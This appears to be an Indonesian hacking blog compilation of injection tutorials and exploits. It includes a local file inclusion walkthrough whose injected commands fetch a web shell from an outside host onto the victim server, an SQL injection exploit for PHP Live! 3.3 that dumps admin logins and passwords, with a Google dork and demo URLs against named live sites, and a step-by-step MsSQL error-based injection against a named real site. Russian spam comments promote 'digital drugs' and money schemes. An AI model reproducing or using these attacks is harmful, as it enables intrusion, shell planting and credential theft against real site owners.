Djarum Black: Injection 2

Injec Local File Inclusion
PHP live! 3.3 (deptid) Remote SQL injection
[SQL Injection Tool] Hexjector v1.0.7.4
Tutorial ASP MsSQL Injection

1.Injec Local File Inclusion

pengertian Local file inclusion adalah sebuah celah atau lubang pada site yang di mana para attacker bisa mengakses semua file atau mengambil alih site di dalam server dengan hanya melalui URL.

Oke Langsung aja Langkah-Langkahnya, ikuti pelan2 cara di bawah ini:

Buka browser anda, saya sendiri memakai mozilla firefox Ketikan di addrees bar di atas seperti ini “about:” (tanpa tanda kutip) klo sudah liat kata “Build identifier:blabla” itu masih bawaan asli dari firefox kamu..sekarang kita ubah Build identifier itu caranya seperti ini ketik “about:config” lalu enter dan enter sampai muncul config-config firefox kamuâ€¦nah sekarang kita buat string baru di sana klik kanan di mana saja, lalu pilih New-String klo sudah muncul kotak new string value isi dengan “general.useragent.override” lalu klik OK dan isi enter new valuenya dengan “” klo sudah klik OK saja..SELESE sekarang cek Build identifier sudah berubah ato belum dengan cara ketik lagi “about:” klo berubah seperti ini “Build identifier: ” nah firefox anda sudah siap untuk di pakai inject LFI
di sini saya tidak membicarakan bot scan LFI klo mau scan LFI langsung aja masuk ke irc.stmikbg.com..oke sekarang perhatikan hasil scan lfi iniâ€¦ex: http://www.BlaBla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ nah sekarang buka site diatas dengan browser yang sudah kamu modif tadi tinggal copy di addrees lalu enter yang nantinya akan muncul seperti ini:

DOCUMENT_ROOT=/home/blabla/public_html/games?GATEWAY_INTERFACE=CGI/1.1?HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8?HTTP_ACCEPT_CHARSET=ISO-8859-1,utf-8;q=0.7,*;q=0.7?HTTP_ACCEPT_ENCODING=gzip,deflate?HTTP_ACCEPT_LANGUAGE=en-us,en;q=0.5?HTTP_CONNECTION=keep-alive?HTTP_COOKIE=UserInteraction7=KonaBase?HTTP_HOST=blabla.com?HTTP_KEEP_ALIVE=300?HTTP_USER_AGENT=
Notice: Undefined index: cmd in /proc/20085/environ on line 1
Warning: system() [function.system]: Cannot execute a blank command in /proc/20085/environ on line 1
PATH=/bin:/usr/bin?QUERY_STRING=action=../../../../../../../../../../../../../../../proc/self/environ?REDIRECT_STATUS=200?REMOTE_ADDR=222.124.156.231?REMOTE_PORT=3420?REQUEST_METHOD=GET?REQUEST_URI=//index.php?action=../../../../../../../../../../../../../../../proc/self/environ?SCRIPT_FILENAME=/home/blabla/public_html/zzz/index.php?SCRIPT_NAME=/index.php?SERVER_ADDR=174.132.115.6?SERVER_ADMIN=webmaster@blabla.com?SERVER_NAME=blabla.com?SERVER_PORT=80?SERVER_PROTOCOL=HTTP/1.1?SERVER_SIGNATURE=
Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at blabla.com Port 80
SERVER_SOFTWARE=Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8n DAV/2 mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635?UNIQUE_ID=S@eCPK6EcwIAAAiIu9gAAAOD?

nah sekarang tinggal kita inject aja tuhh web dengan cara seperti ini liat dulu ini :
http://www.BlaBla.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ <==setelah kamu enter environ akan berubah menjadi seperti ini environ? kalo mau inject ato setiap perubahan data yang mau di inject kembaliin seperti semula lagi seperti ini environ klo gak begitu data yang mau di wget ke dalam site tersebut tidak berjalan jadi harus kita ubah setiap kita enter..MENGERTI kanâ€¦klo gak percaya test aja sendiri nah sekarang tinggal kita tambahkan wget di belakangnya seperti ini :
ada banyak cara kalo mau inject lfi coba aja satu-satu :

http://www.croot.croot.croot.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ&cmd=wget http://citbun.com/tools/bd/fxshell.txt -O scroll.php

http://www.croot.croot.croot.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ&cmd=curl http://citbun.com/tools/bd/fxshell.txt -o scroll.php

http://www.croot.croot.croot.com//index.php?action=../../../../../../../../../../../../../../../proc/self/environ&cmd=lynx http://citbun.com/tools/bd/fxshell.txt -o scroll.php

http://www.croot.croot.croot.com//index.php?action=../../../../../../../../../

************************************************

2. PHP live! 3.3 (deptid) Remote SQL injection

[o] PHP Live! 3.3 (deptid) Remote SQL Injection

 --==[ Author ]==--
[+] Author : v3n0m
[+] Contact : v3n0m666[at]live[dot]com
[+] Blog : http://0wnage.wordpress.com/
[+] Group : YOGYACARDERLINK
[+] Site : http://yogyacarderlink.web.id/
[+] Date : September, 02-2009 [INDONESIA]
*************************************************************************
 --==[ Details ]==--
[+] Software : PHP Live! Chat
[+] Version : v3.3
[+] Vendor : http://www.phplivesupport.com/
[+] Price : $49.95
[+] Vulnerable : Remote SQL Injection
[+] Google Dork : "Powered by PHP Live! v3.3"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

[-] Exploit:
[+] -999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[-] Remote SQLi p0c:
[+] http://127.0.0.1/[path]/message_box.php?theme=&l=[username]&x=[xxx]&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--
 [xxx] = Valid x number

[-] Demo Live:
[+] http://www.edunet-help.com/message_box.php?theme=&l=sekolahmy&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

[+] https://www.guestcentric.com/support/message_box.php?theme=&l=guestcentric_wb&x=1&deptid=-999999+union+select+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,group_concat(login,char(58),password)v3n0m,0,0+from+chat_admin--

FYI: Think twice before you buy these vulnerable script for $49.95 ?

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Special Thanks => str0ke & milw0rm
RedLine Crew => Bang Musa,Bang Yuan Rasugi Sang,Mas Andre,Dagol,Yazid
 => Ogie,Angga,Indah Boing,by-y0u Pletokan,Andrew
YOGYACARDERLINK => lingah,LeQhi,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,aRiee
 => yoga0400,ghareng,eidelweiss,pKi,kaka11,z0mb13,Travis Eshan
 => & para gay yogyagaylink bruakakakakakakak
Others => g0par Santiago,Don Tukulesto,mixbrainwasher
 => badkiddies,broken_hack,M364TR0N & ALL MOSLEM HACKERS
Big Thanks => mywisdom [nice 0-day, you're 31337]
 => yadoy666 [Mari kita ganyang malingsianjink]
 => Angela Zhang [kamu cantik,eksotis & mengerikan] (=^_^=)

* Fuck to Malaysia <= the truly thief asia
be carefull your culture art & song,island get stolen and claimed by them
letz we hack they sites & servers !! PROUD TO BE INDONESIAN !!
* 11:20pm in my bedroom, preparing office goes on...!!

# milw0rm.com [2009-09-02]

Views: 4482 | Added by: zomb13 | Tags: php, SQLi, patch SQLi, SQL injection | Rating: 0.0/0

Total comments: 3

3 Sypefrept (03.27.2010 11:14 PM)

Для многих не известно что файлообменные сервисы sms4file.com,vip-file.com,letitbit.net и ряд менее популярных имеют одного хозяина, а так же и сервера для хранения файлов, что бы экономить место под файлы ими придумана система позволяющая к одному файлу получать ссылку на разные сервисы, воспользовавшись этим мы можем скачивать файлы бесплатно переставив несколько символов в ссылке на файл, приведу пример. В ссылке на файл ,то что в скобках, надо заменить на приведенное ниже:
(http://sms4file.com/download/5143.)571d034bbe98e24d0d8ab08494/XP_03_2010.iso.html
http://vip-file.com/download/
-----------------
(http://sms4file.com/download/1262.)15a4b57de1595fa56e2002e5e0/NRJ_Summer_Hits_Only_2009.rar.html
http://letitbit.net/download/
--------------------------------
(http://sms4file.com/downloadvip/4542.)442e87090b37022578dc16de5f6bb12d/Armiya.2009.BDRip.720p.mkv.html
http://vip-file.com/download/
После замены вставляем полученное в браузер и скачиваем уже не с sms4file com ,а с vip-file com или letitbit net, многие скажут что с этих обменников чтоб скачивать надо иметь премиум, но многие варез сайты для того чтоб увеличить популярность своего сайта ежедневно раздают на своем сайте ключи для скачивания с этих обменников, вам легко можно их найти в поиске яндекса или гугла.
Так же есть хитрость, если имеется ссылка на letitbit ,но у вас имеется премиум на vip-file, то можно зарегистрировать себе аккуаунт на vip-file, в разделе файлы по удаленной загрузке в считанные секунды ссылка на letitbit переобразовывается в vip-file.
Всем удачных загрузок.

2 Bupsamulleype (03.22.2010 12:26 PM)

<a href=http://www.webdoping.ru/?rid=3501>Цифровой допинг и стимуляторы сознания</a> Вы сможете попробовать о чем в тайне мечтали, но боялись или не могли себе позволить,легально и совершенно бесплатно. <a href=http://www.superdoza.ru/?rid=3501>Аудионаркотики</a>, оказывающие влияние на мозг за счет бинауральных ритмов, не вызывают привыкания. При этом ощущение, которые Вы испытаете после прослушивания, полностью имитируют действие настоящих препаратов. Только на нашем сайте Вы найдете самую полную коллекцию всех существующих цифровых наркотиков, а также оздоровительных и стимулирующих доз, также основанных на принципе работы бинауральных волн.
Основное направление:
<a href=http://www.webdoping.ru/?rid=3501>Аудионаркотики (цифровые наркотики)</a>
<a href=http://www.superdoza.ru/?rid=3501>Похудение (улучшение здоровья)</a>
<a href=http://www.virtulet.ru/?rid=3501>Антитабак (улучшение здоровья)</a>
<a href=http://www.webdoping.ru/?rid=3501>Спортивный допинг (стероиды)</a>
<a href=http://www.superdoza.ru/?rid=3501>Виагра (секс)</a>
<a href=http://www.virtulet.ru/?rid=3501>Оргазм (секс)</a>
<a href=http://www.virtulet.ru/?rid=3501>Марки,Кокс,Кислота,Белый,Викодин,Алкоголь,Никотин,Винт,Меск,Дренокром,К ристалл,Декс,DMT,Соломка,Гавайская роза,Крэк,Йопо (буфотенин),АМФ,Хэш,Кетиш,Клей,Травка,Морф,Яба.</a>
<a href=http://www.webdoping.ru/?rid=3501>Оргазм,Тантрический секс,Виагра,Hardcore,Афродизиак,Любовная эйфория,Послевкусие оргазма,BDSM,Мультиоргазм.</a>
<a href=http://www.superdoza.ru/?rid=3501>Будильник,Cеротонин - гормон счастья,Мозговой штурм,Энерджайзер,Алкоголь,Никотин,Адреналин,Быстрый приход,Вдохновение,Победа,Заряд счастья,Уверенность,Равновесие,Драйв,Похудение.</a>
<a href=http://www.virtulet.ru/?rid=3501>Антимигрень,Кремлевская таблетка,Антипохмелин,Снотворное,Антитабак,Возвращение молодости,Анестезия.</a>
<a href=http://www.webdoping.ru/?rid=3501><img>http://img5.immage.de/2203555958b29997d90.jpg</img></a>

1 ALKAMLIVA (03.20.2010 8:27 PM)

<a href=http://www.i-million.ru/?rid=3501>Заработок в интернете</a> Проект создан для тех, кто хочет <a href=http://www.i-million.ru/?rid=3501>научиться зарабатывать с помощью интернета</a> и своего компьютера. Мы не будем предлагать Вам ничего купить у нас, не будем предлагать Вам финансовые пирамиды и форекс, мы просто хотим помочь тем людям, которых интересует реальный интернет-бизнес, без мошенничества и обмана. Вы узнаете, как можно <a href=http://www.i-million.ru/?rid=3501>зарабатывать деньги без вложений</a> и без собственного сайта. Вы узнаете о многих других секретах, которые скрываются в сети Интернет и как это может пригодиться Вам на пути к успеху.
<a href=http://www.i-million.ru/?rid=3501>Подробная информация о заработке в интернете</a>
<a href=http://www.i-million.ru/?rid=3501><img>http://img6.immage.de/19038674.png</img></a>

Referensi :
http://zomb13.do.am/news/php_live_33_deptid_remote_sql_injection/2009-09-08-2

*******************************************************************

3.[SQL Injection Tool] Hexjector v1.0.7.4

Hexjector is an Opensource,Cross Platform PHP script to automate site
Pentest for SQL Injection Vulnerabilties.

Version 1.0.7.4 (3/7/2010)

Hexjector v1.0.7.4
-WAF_Detector v1.0.2
-HexacURL v1.0.1
-Hexafind v1.0.1
-Error_Check v1.0.2
-Hexdumper v1.0.1
-HexaCurD v1.0.0
-Hexdumpfile v1.0.0
-Hexoutfile v1.0.0
-Hexloader v1.0.0
-HexDorker v1.0.1

-MsAccess SQL Injection is not added yet, it will be added in the next version.
-MySQL Injection v4 is back !
-WebPanel is Added.
-Every additional tool is separated to enable users to know the progress of the
additional tools.
-Index.php is made to convenient users in using tools of Hexjector.
-Refined the code to reduce wastage of HTTP Requests.
-Every file that specialized in Connection will have a prefix "Con_".
-Waf_Detector.php is removed.
-Waf_Detector is integrated into each Connection.
-Every File with Waf_Detector have a postfix "_WD" to ease users & developers
to identify it.
-Wafdetect on MySQL Injection v4 is disabled by default as it may hinder the process.
(Enabled back by integrating connection with wafdetect)
-wafdetect is removed as wafdetect is integrated into each Connection.
-Coalesce() is removed.
-Problem on Webservers not using apache is fixed. (Apache_request_headers() )
-Error_reporting is enabled. (Previously disabled due to my fault)
-Background of Hexjector is changed.
-Hexjector Wordpress Blog opened (http://sourceforge.net/hexjector/wordpress)
-Personal Wordpress Blog opened.
-Wallpaper Gallery opened.
-Users can see Wallpapers submitted at the Gallery.
-Filename error fixed as Filename is case-sensitive in Unix.
-Auto-Update Check is done.
-Union All select in Information.php is changed to Union distinct select.
-HexacURL and HexDorker is separated from main

A New Tool had been made.
-HexaCurD.php is made.
-HexaCurD is an additional tool to aid users to retrieve the Current Directory
of a particular table in MsAccess SQL Injection.

A New Tool had been made.
-HexDorker.php is made.
-HexDorker is a Tool to search for sites by using Google Dork and check the sites
for SQL Injection Vulnerabilities.

Download Link:

Win32 :
http://sourceforge.net/projects/hexject ... r%20(Win32)/Hexjector%20v1.0.7.4.zip/download

Unix :
http://sourceforge.net/projects/hexject ... or%20(Unix)/Hexjector%20v1.0.7.4.tar/download

Mac :
http://sourceforge.net/projects/hexject ... tor%20(Mac)/Hexjector%20v1.0.7.4.tar/download

Referensi :

http://jatimcrew.org/forum/viewtopic.php?f=88&t=6152

************************************************************

4.Tutorial ASP MsSQL Injection

Contoh Web Yang Vuln :

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12

CEK VULN / GAK !!!
==================

Cek Bisa di Inject apa gak dgn cara tambah kan tanda ' di akhir URL

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12'

Jika Error nya seperti ini :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56

Microsoft OLE DB Provider (SQL Server Driver) <---- Inti nya ada di sini !!!
Selain SQL Server Driver (Provider) ndak tau deh gua :D

maka Lanjut ...

CARI STRUKTUR TABEL !!!
=======================

1) Debugging

Debugging di sini untuk memunculkan pesan error dr MsSQL.

SQL Inject nya adalah "and 1="

2) Munculkan nama tabel

Query nya : and 1=convert(int,(select top 1 table_name from information_schema.tables))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables))--

Error yang muncul adalah :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.
/main/ListPosts.asp, line 56

bisa dilihat di situ kita dapat tabel dengan nama "Merchants".

berbeda dgn MySQL, MsSQL dalam output nya membedakan tipe data, sehingga kita perlu mengkonversi nya agar SQL dapat memunculkan pesan error yang kita inginkan.

skrg kita cari tabel selanjut nya.

Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--

Error yang muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/main/ListPosts.asp, line 56

Bisa di lihat Query nya berbeda dgn MySQL. MySQL ndak support "not in" sedangkan MsSQL support "not in" ^^

nah dapat tabel dgn nama "category" .... kita coba cari lagi tabel selanjut nya.

Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--

Error yng muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.
/main/ListPosts.asp, line 56

dapat tabel dgn nama "Codes". Silahkan cari lagi nama tabel yang di inginkan.

CARI STRUKTUR COLUMN !!!
========================

Contoh kita mau cari column yg ada di tabel "Merchants".

Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.
/main/ListPosts.asp, line 56

dapat deh column dgn nama "merchantId" ... yok cari lagi column laen :D

QUery : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.
/main/ListPosts.asp, line 56

dapat deh column "address". cari lage column ne ...

Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--

Error yg muncul:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.
/main/ListPosts.asp, line 56

dapat tuh column "merchantName" ekkekekeke ....

Silahkan kalo mo nyari lagi ^^

PENGAMBILAN DATA !!!
====================

Contoh kita mau lihat isi dari column "merchantid, address, merchantName" yg ada di tabel "Merchants".

Query : and 1=convert(int,(select top 1 merchantid from merchants))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 merchantid from merchants))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.
/main/ListPosts.asp, line 56

dapat "merchantid" = "alohacc".

nah gmn kalo mau ngambil isi column ne sekaligus ??

Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress%2b':'%2bmerchantName from merchants))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.
/main/ListPosts.asp, line 56

Note : %2b = + sedangkan ':' = pembatas

FINISH !!!
==========